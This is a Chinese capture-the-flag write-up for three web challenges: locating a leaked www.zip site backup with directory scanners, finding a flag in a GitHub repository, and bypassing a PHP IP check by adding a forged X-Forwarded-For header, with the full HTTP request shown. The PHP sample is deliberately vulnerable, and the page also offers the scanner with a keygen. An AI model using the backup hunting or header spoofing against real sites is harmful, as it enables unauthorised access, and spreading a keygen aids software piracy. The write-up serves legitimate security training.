CTF10月月赛WEB方向题解

2019-10-27T22:29:00

猜猜flag在哪

提示:你知道网站备份吗?

题解

这是一条简单的WEB源码泄漏题目,主要考察的是如何利用网站管理员的疏忽,直接通过备份/部署工具获得网站源码。

原理也很简单,如果管理员在备份网站的时候,不慎备份到了网站目录内部,那样就会留下一个包含网站所有代码的压缩包。

而这题是典型的win下备份的例子,WIN下网站目录多为www www-data site啊等网站目录,直接压缩就会压缩成www/www-data/site/ . zip/rar/7z 等等类似的文件

而这题正好就是www.zip文件,地址是:http://139.199.72.13:20019/www.zip

有人问:难道比赛的时候,我还得一个一个自己慢慢敲?来判断有没有这个文件?

这时候就要用到工具了,常用的是御剑WEB扫描(相信做安全的应该没人不知道吧)和DirBuster,相比之下DirBuster更加专业,但需要配置java环境,而且自带的字典也太大了一些,相比之下御剑WEB更符合竞赛要求和国情。

使用御剑选择DIR直接就扫描出来了

御剑的下载会放在文末,包括注册机

相关延伸

此类题目还有.git目录泄漏 SVN泄漏 phps等等,都属于直接的源码泄漏

Gayhub

提示:你知道全球最大交友网站吗

题解

这题是群主自己加的料,也同样是很简单的一道题目

首先打开群主的github项目目录 https://github.com/Catsofsuffering/iBizSim-prediction-model

看到目录中的 flag.txt,打开查看文件内容

this is a SWCTF_Flag{139.199.72.13:20020}

find the php bug

<?php
function GetIP(){
if(!empty($_SERVER["HTTP_CLIENT_IP"]))
    $cip = $_SERVER["HTTP_CLIENT_IP"];
else if(!empty($_SERVER["HTTP_X_FORWARDED_FOR"]))
    $cip = $_SERVER["HTTP_X_FORWARDED_FOR"];
else if(!empty($_SERVER["REMOTE_ADDR"]))
    $cip = $_SERVER["REMOTE_ADDR"];
else
    $cip = "0.0.0.0";
return $cip;
}
$GetIPs = GetIP();
if ($GetIPs=="1.1.1.1"){
echo "Great! Key is *********";
}
else{
echo "Error!Your IP is not on the access list!";
}
?>
© 2019 GitHub, Inc.

很明显的php代码审计,关键点就是那三个if

典型的要求IP伪装,伪装方式是通过CLIENT_IP X_FORWARDED_FOR REMOTE_ADDR 三个header来决定客户端IP,并赋值给GetIPs变量

个人习惯使用XFF头,直接上burp,burp到处都是,就不发了,萌新用免费版都够了

GET / HTTP/1.1
Host: 139.199.72.13:20020
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

增加一行
X-FORWARDED-FOR: 1.1.1.1
变成这样

GET / HTTP/1.1
Host: 139.199.72.13:20020
Pragma: no-cache
X-FORWARDED-FOR: 1.1.1.1
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
DNT: 1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

拿到flag

工具

御剑WEB目录扫描优化版.7z

当前页面是本站的「Baidu MIP」版。查看、发表评论或购买附件请点击:完整版 »